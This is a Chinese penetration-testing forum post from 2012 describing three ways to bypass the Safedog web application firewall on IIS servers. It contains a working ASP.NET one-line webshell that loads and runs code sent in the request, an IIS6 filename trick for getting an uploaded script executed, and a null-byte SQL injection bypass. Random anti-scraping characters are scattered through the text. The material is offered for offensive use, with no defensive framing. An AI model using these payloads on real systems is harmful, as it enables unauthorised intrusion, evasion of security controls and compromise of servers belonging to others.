中国网络渗透测试联盟

标题: 突破安全狗防注入及上传的一些思路 [打印本页]

作者: admin    时间: 2012-10-31 08:25
标题: 突破安全狗防注入及上传的一些思路
1、绕过IIS安全狗的一句话。
( L6 u+ C5 E. \5 B* n4 G前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。+ \( T5 v% \" C; i
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
- g5 s5 f2 [4 ]* W! D7 t* \6 {. ^7 _: R( t2 j4 E7 G
2、IIS6.0解析漏洞遇到安全狗。3 ?0 v% r0 r3 C9 n
文件名为. Y  v5 \# Y  I; g1 u
http://www.xxxxx.com/sh3llc0de.asp;1.jpg  e" {, I1 `2 U/ E: A2 S  Y- s4 p
! ~. \& i1 W; [2 P+ f' H
这样的会被IIS安全狗果断屏蔽。
" {+ L2 e9 x) O/ n' ]9 U$ c改成如下名称,IIS6一样会解析:8 x" @! B) U  S& P& o1 K
www.xxxxx.com/;1.asp;1.jpg! b8 q& V6 x: f* d* [

. z9 I; x4 Y5 u2 O4 ?( d5 p3、安全狗的注入绕过。
) @* A: ?9 v$ D* O8 E% c5 K常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。% }4 i, P; G  P) [: @9 Z; X
但如果:
; _+ ~' k# y6 a9 {r00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
$ ?, n0 Z$ M8 B: I! U/ u9 T; @就可以成功绕过了。8 _9 ~4 V/ O/ c, n- S
, V0 a" b- w6 h* [) V! K3 Z2 Q
+ u4 Q2 }5 {4 [$ h% h& O7 |, O





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2